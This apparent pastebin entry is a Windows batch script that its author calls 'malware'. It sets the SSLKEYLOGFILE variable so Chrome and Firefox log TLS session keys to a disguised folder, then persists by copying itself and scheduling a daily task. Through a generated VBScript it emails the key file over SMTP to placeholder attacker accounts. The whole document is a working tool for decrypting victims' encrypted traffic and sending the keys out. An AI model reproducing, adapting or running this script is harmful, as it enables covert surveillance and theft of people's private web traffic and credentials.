SHOW:
|
|
- or go back to the newest paste.
| 1 | :: Decrypt #TLS & #SSL sniffed traffic via SSLKEYLOGFILE feature of Chrome and Firefox, using my tiny "malware" ! | |
| 2 | :: http://www.sans.org/reading-room/whitepapers/authentication/ssl-tls-whats-hood-34297 | |
| 3 | :: Tested on Windows 7 about a year ago | |
| 4 | ||
| 5 | @echo off | |
| 6 | setlocal | |
| 7 | ||
| 8 | mkdir c:\windows_files | |
| 9 | echo. 2> c:\windows_files\premaster.txt | |
| 10 | setx SSLKEYLOGFILE "c:\windows_files\premaster.txt" | |
| 11 | ||
| 12 | copy %0 "c:\windows_files\windows.bat" > nul | |
| 13 | ||
| 14 | SchTasks /Create /SC DAILY /TN βMYβ /TR βC:\windows_files\windows.batβ /ST 09:00 | |
| 15 | ||
| 16 | ||
| 17 | :: use these settings to send from a gmail account | |
| 18 | :: set port=465 and set SSL=True | |
| 19 | ||
| 20 | :: use these settings for standard email SMTP port and no encryption | |
| 21 | :: set port=25 and set SSL=False | |
| 22 | ||
| 23 | :: Change these following items to use the same variables all the time | |
| 24 | :: or use the command line to pass all the variables | |
| 25 | ||
| 26 | set Port=465 | |
| 27 | set SSL=True | |
| 28 | set From="attacker@yahoo.com" | |
| 29 | set To="attacker@eyahoo.com" | |
| 30 | set Subject="Subject line" | |
| 31 | set Body="Email Body in one line" | |
| 32 | set SMTPServer="smtp.mail.yahoo.com" | |
| 33 | set User="attacker_yahoo_username" | |
| 34 | set Pass="attacker_yahoo_password" | |
| 35 | set fileattach="c:\windows_files\premaster.txt" | |
| 36 | ||
| 37 | ||
| 38 | :: This section sets the command line arguments | |
| 39 | ||
| 40 | ||
| 41 | if "%~7" NEQ "" ( | |
| 42 | set From="%~1" | |
| 43 | set To="%~2" | |
| 44 | set Subject="%~3" | |
| 45 | set Body="%~4" | |
| 46 | set SMTPServer="%~5" | |
| 47 | set User="%~6" | |
| 48 | set Pass="%~7" | |
| 49 | set fileattach="%~8" | |
| 50 | ) | |
| 51 | ||
| 52 | set "vbsfile=%temp%\email-bat.vbs" | |
| 53 | del "%vbsfile%" 2>nul | |
| 54 | set cdoSchema=http://schemas.microsoft.com/cdo/configuration | |
| 55 | echo >>"%vbsfile%" Set objArgs = WScript.Arguments | |
| 56 | echo >>"%vbsfile%" Set objEmail = CreateObject("CDO.Message")
| |
| 57 | echo >>"%vbsfile%" objEmail.From = %From% | |
| 58 | echo >>"%vbsfile%" objEmail.To = %To% | |
| 59 | echo >>"%vbsfile%" objEmail.Subject = %Subject% | |
| 60 | echo >>"%vbsfile%" objEmail.Textbody = %body% | |
| 61 | if exist %fileattach% echo >>"%vbsfile%" objEmail.AddAttachment %fileattach% | |
| 62 | echo >>"%vbsfile%" with objEmail.Configuration.Fields | |
| 63 | echo >>"%vbsfile%" .Item ("%cdoSchema%/sendusing") = 2 ' not local, smtp
| |
| 64 | echo >>"%vbsfile%" .Item ("%cdoSchema%/smtpserver") = %SMTPServer%
| |
| 65 | echo >>"%vbsfile%" .Item ("%cdoSchema%/smtpserverport") = %port%
| |
| 66 | echo >>"%vbsfile%" .Item ("%cdoSchema%/smtpauthenticate") = 1 ' cdobasic
| |
| 67 | echo >>"%vbsfile%" .Item ("%cdoSchema%/sendusername") = %user%
| |
| 68 | echo >>"%vbsfile%" .Item ("%cdoSchema%/sendpassword") = %pass%
| |
| 69 | echo >>"%vbsfile%" .Item ("%cdoSchema%/smtpusessl") = %SSL%
| |
| 70 | echo >>"%vbsfile%" .Item ("%cdoSchema%/smtpconnectiontimeout") = 30
| |
| 71 | echo >>"%vbsfile%" .Update | |
| 72 | echo >>"%vbsfile%" end with | |
| 73 | echo >>"%vbsfile%" objEmail.Send | |
| 74 | ||
| 75 | cscript.exe /nologo "%vbsfile%" | |
| 76 | echo email sent (if variables were correct) |
